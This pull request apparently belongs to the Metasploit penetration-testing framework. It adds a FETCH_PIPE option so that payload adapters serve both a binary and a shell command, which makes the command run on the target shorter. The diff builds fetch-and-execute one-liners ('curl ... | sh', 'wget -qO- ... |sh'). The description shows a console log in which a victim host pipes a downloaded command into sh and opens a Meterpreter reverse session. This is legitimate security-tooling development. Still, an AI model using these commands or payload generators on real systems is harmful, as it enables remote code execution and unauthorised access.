### PR TITLE
Add PIPE_FETCH option to fetch payloads to make payloads shorter

### DIFF
--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -400,9 +400,9 @@ module Msf::Payload::Adapter::Fetch
   def _generate_wget_pipe
     case fetch_protocol
     when 'HTTPS'
-      return "wget --no-check-certificate -qO - https://#{_download_pipe}|sh"
+      return "wget --no-check-certificate -qO- https://#{_download_pipe}|sh"
     when 'HTTP'
-      return "wget -qO - http://#{_download_pipe}|sh"
+      return "wget -qO- http://#{_download_pipe}|sh"
     else
       fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
     end

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -87,14 +87,10 @@ module Msf::Payload::Adapter::Fetch
     opts[:code] = super
     @srvexe = generate_payload_exe(opts)
     if datastore['FETCH_PIPE']
-      @pipe_cmd = '(' + generate_fetch_commands + ')'
-      vprint_status(@pipe_cmd)
+      @pipe_cmd = generate_fetch_commands
+      vprint_status("Command served: #{@pipe_cmd}")
       cmd = generate_pipe_command
-      if datastore['FETCH_FILELESS']
-        cmd << 'bash'
-      else
-        cmd << 'sh'
-      end    else
+    else
       cmd = generate_fetch_commands
     end
     vprint_status("Command to run on remote host: #{cmd}")
@@ -313,11 +309,11 @@ module Msf::Payload::Adapter::Fetch
   def _generate_curl_pipe
     case fetch_protocol
     when 'HTTP'
-      pipe_cmd = "curl -s http://#{_download_pipe} | "
+      return "curl -s http://#{_download_pipe} | sh"
     when 'HTTPS'
-      pipe_cmd = "curl -sk https://#{_download_pipe} | "
+      return "curl -sk https://#{_download_pipe} | sh"
     when 'TFTP'
-      pipe_cmd = "curl -s tftp://#{_download_pipe} | "
+      return "curl -s tftp://#{_download_pipe} | sh"
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
     end
@@ -387,9 +383,9 @@ module Msf::Payload::Adapter::Fetch
   def _generate_wget_pipe
     case fetch_protocol
     when 'HTTPS'
-      return "wget --no-check-certificate -qO - https://#{_download_pipe} | "
+      return "wget --no-check-certificate -qO - https://#{_download_pipe} | sh"
     when 'HTTP'
-      return "wget -qO - http://#{_download_pipe} | "
+      return "wget -qO - http://#{_download_pipe} | sh"
     else
       return nil
     end

--- a/lib/msf/core/payload/adapter/fetch/http.rb
+++ b/lib/msf/core/payload/adapter/fetch/http.rb
@@ -11,7 +11,7 @@ module Msf::Payload::Adapter::Fetch::HTTP
 
   def cleanup_handler
     if @fetch_service
-      cleanup_http_fetch_service(@fetch_service, @delete_resource)
+      cleanup_http_fetch_service(@fetch_service, @myresources)
       @fetch_service = nil
     end
 
@@ -19,8 +19,15 @@ module Msf::Payload::Adapter::Fetch::HTTP
   end
 
   def setup_handler
-    @fetch_service = start_http_fetch_handler(srvname, @srvexe) unless datastore['FetchHandlerDisable']
+    unless datastore['FetchHandlerDisable']
+      @fetch_service = start_http_fetch_handler(srvname) unless datastore['FetchHandlerDisable']
+      escaped_uri = ('/' + srvuri).gsub('//', '/')
+      add_resource(@fetch_service, escaped_uri, @srvexe)
+      unless @pipe_uri.nil?
+        uri = ('/' + @pipe_uri).gsub('//', '/')
+        add_resource(@fetch_service, uri, @pipe_cmd)
+      end
+    end
     super
   end
-
 end

--- a/lib/msf/core/payload/adapter/fetch/http.rb
+++ b/lib/msf/core/payload/adapter/fetch/http.rb
@@ -20,7 +20,7 @@ module Msf::Payload::Adapter::Fetch::HTTP
 
   def setup_handler
     unless datastore['FetchHandlerDisable']
-      @fetch_service = start_http_fetch_handler(srvname) unless datastore['FetchHandlerDisable']
+      @fetch_service = start_http_fetch_handler(srvname)
       escaped_uri = ('/' + srvuri).gsub('//', '/')
       add_resource(@fetch_service, escaped_uri, @srvexe)
       unless @pipe_uri.nil?

--- a/lib/msf/core/payload/adapter/fetch/https.rb
+++ b/lib/msf/core/payload/adapter/fetch/https.rb
@@ -20,7 +20,7 @@ module Msf::Payload::Adapter::Fetch::Https
 
   def setup_handler
     unless datastore['FetchHandlerDisable']
-      @fetch_service = start_https_fetch_handler(srvname) unless datastore['FetchHandlerDisable']
+      @fetch_service = start_https_fetch_handler(srvname)
       escaped_uri = ('/' + srvuri).gsub('//', '/')
       add_resource(@fetch_service, escaped_uri, @srvexe)
       unless @pipe_uri.nil?

--- a/lib/msf/core/payload/adapter/fetch/https.rb
+++ b/lib/msf/core/payload/adapter/fetch/https.rb
@@ -11,7 +11,7 @@ module Msf::Payload::Adapter::Fetch::Https
 
   def cleanup_handler
     if @fetch_service
-      cleanup_http_fetch_service(@fetch_service, @delete_resource)
+      cleanup_http_fetch_service(@fetch_service, @myresources)
       @fetch_service = nil
     end
 
@@ -19,8 +19,15 @@ module Msf::Payload::Adapter::Fetch::Https
   end
 
   def setup_handler
-    @fetch_service = start_https_fetch_handler(srvname, @srvexe) unless datastore['FetchHandlerDisable']
+    unless datastore['FetchHandlerDisable']
+      @fetch_service = start_https_fetch_handler(srvname) unless datastore['FetchHandlerDisable']
+      escaped_uri = ('/' + srvuri).gsub('//', '/')
+      add_resource(@fetch_service, escaped_uri, @srvexe)
+      unless @pipe_uri.nil?
+        uri = ('/' + @pipe_uri).gsub('//', '/')
+        add_resource(@fetch_service, uri, @pipe_cmd)
+      end
+    end
     super
   end
-
 end

--- a/lib/msf/core/payload/adapter/fetch/linux_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/linux_options.rb
@@ -5,9 +5,9 @@ module Msf::Payload::Adapter::Fetch::LinuxOptions
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
         Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),
-        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
-        Msf::OptBool.new('FETCH_PIPE', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false]),
-        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
+        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'none']),
+        Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL WGET]]),
+        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'none'])
       ]
     )
   end

--- a/lib/msf/core/payload/adapter/fetch/linux_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/linux_options.rb
@@ -6,7 +6,8 @@ module Msf::Payload::Adapter::Fetch::LinuxOptions
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
         Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
-        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', '/tmp'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
+        Msf::OptBool.new('FETCH_PIPE', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false]),
+        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
       ]
     )
   end

--- a/lib/msf/core/payload/adapter/fetch/server/https.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/https.rb
@@ -42,7 +42,7 @@ module Msf::Payload::Adapter::Fetch::Server::Https
     datastore['FetchSSLVersion']
   end
 
-  def start_https_fetch_handler(srvname, srvexe)
-    start_http_fetch_handler(srvname, srvexe, true, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
+  def start_https_fetch_handler(srvname)
+    start_http_fetch_handler(srvname, true, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
   end
 end

--- a/lib/msf/core/payload/adapter/fetch/windows_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/windows_options.rb
@@ -6,6 +6,7 @@ module Msf::Payload::Adapter::Fetch::WindowsOptions
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL TFTP CERTUTIL }]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}),
+        Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL]]),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', '%TEMP%'], regex:/^[\S]*$/)
       ]
     )

--- a/modules/payloads/adapters/cmd/windows/smb/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/smb/x64.rb
@@ -20,7 +20,7 @@ module MetasploitModule
         'AdaptedPlatform' => 'win'
       )
     )
-    deregister_options('FETCH_DELETE', 'FETCH_SRVPORT', 'FETCH_WRITABLE_DIR')
+    deregister_options('FETCH_DELETE', 'FETCH_SRVPORT', 'FETCH_WRITABLE_DIR', 'FETCH_FILENAME')
   end
 
   def srvport


### PR DESCRIPTION
Adds an option to the fetch payloads to serve both the payload and the command to run.  This dramatically lowers the size of the command that needs to be run since we're fetching the command and piping it directly into the shell.
When enabled and verbose is set to `true`, it will display both the command that is served, and the command that needs to run:
```
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > show options

Module options (payload/cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Lin
                                              ux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
   FETCH_PIPE      true             yes       Attempt to run payload without touching disk, Linux ≥3.17 only
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      AeomRuQaXq       no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > to_handler
[*] Command served: curl -so ./LnhNSUjF http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg;chmod +x ./LnhNSUjF;./LnhNSUjF&
[*] Command to run on remote host: curl -s http://10.5.135.201:8080/RBy | sh
[*] Payload Handler Started as Job 0
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Adding resource /RBy
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.134.150 requested /RBy
[*] Sending payload to 10.5.134.150 (curl/7.81.0)
[*] Client 10.5.134.150 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.134.150 (curl/7.81.0)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.150:59190) at 2025-04-01 14:10:40 -0500
```

This is super helpful for FILELESS_FETCH versions.
It only works with http[s] fetch payloads using `CURL` or `WGET` on Linux or `CURL` on Windows.